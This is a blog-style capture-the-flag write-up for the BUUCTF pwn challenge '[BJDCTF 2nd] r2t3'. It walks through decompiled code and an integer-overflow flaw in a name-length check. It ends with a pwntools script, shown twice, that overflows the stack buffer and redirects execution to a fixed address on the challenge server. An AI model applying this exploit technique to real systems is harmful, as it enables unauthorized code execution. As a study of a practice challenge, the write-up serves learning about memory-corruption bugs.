CTF-Pwn-[BJDCTF 2nd] r2t3

CTF-Pwn-[BJDCTF 2nd] r2t3

Blog description

The information involved in this article comes from Internet collation and personal summary, which means personal learning and experience summary. If there is any infringement, please contact me to delete, thank you! This article is only for learning and communication, not for illegal use!

CTP platform

Website

https://buuoj.cn/challenges

subject

Pwn class, [BJDCTF 2nd] r2t3

Download the title file

R2t3

thinking

Use the file command to view the file. It is found that it is a 32-bit file. Use ida32-bit to open it

Enter the main function and decompile it with F5

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [esp+0h] [ebp-408h]

  my_init();
  puts("**********************************");
  puts("*     Welcome to the BJDCTF!     *");
  puts("[+]Ret2text3.0?");
  puts("[+]Please input your name:");
  read(0, &buf, 0x400u);
  name_check(&buf);
  puts("Welcome ,u win!");
  return 0;
}

The first is to determine whether the memory overflows

The first thing we'll see is this & buf, you can double-click it to see it, no overflow

There must be a flaw in this topic. Look at the next name check method. You can see it by double clicking in the same way

char *__cdecl name_check(char *s)
{
  char dest; // [esp+7h] [ebp-11h]
  unsigned __int8 v3; // [esp+Fh] [ebp-9h]

  v3 = strlen(s);
  if ( v3 <= 3u || v3 > 8u )
  {
    puts("Oops,u name is too long!");
    exit(-1);
  }
  printf("Hello,My dear %s", s);
  return strcpy(&dest, s);
}

If you see the above code, you can judge that it is an integer overflow

Install LibcSearcher Library

git clone https://github.com/lieanu/LibcSearcher.git

cd LibcSearcher

python setup.py install

Write a script

Python3

#coding=utf-8
from pwn import *
p=remote('node3.buuoj.cn',29748)
 
p.recvuntil("name:")
payload=(0x11+0x4)*b'a'+p32(0x0804858B)
payload=payload.ljust(262,b'a')
p.sendline(payload)
 
p.interactive()

Ptyhon3

#coding=utf-8
from pwn import *
p=remote('node3.buuoj.cn',29748)
 
p.recvuntil("name:")
payload=(0x11+0x4)*b'a'+p32(0x0804858B)
payload=payload.ljust(262,b'a')
p.sendline(payload)
 
p.interactive()

Note the difference between python versions. Add b in front of byte type, which is required by python 3. Otherwise, an error will be reported

test

Then we test run

The flag is there

Thank

BUUCTF

And the industrious self

Tags: Programming Python git github

Posted on Wed, 06 May 2020 08:15:48 -0700 by poknam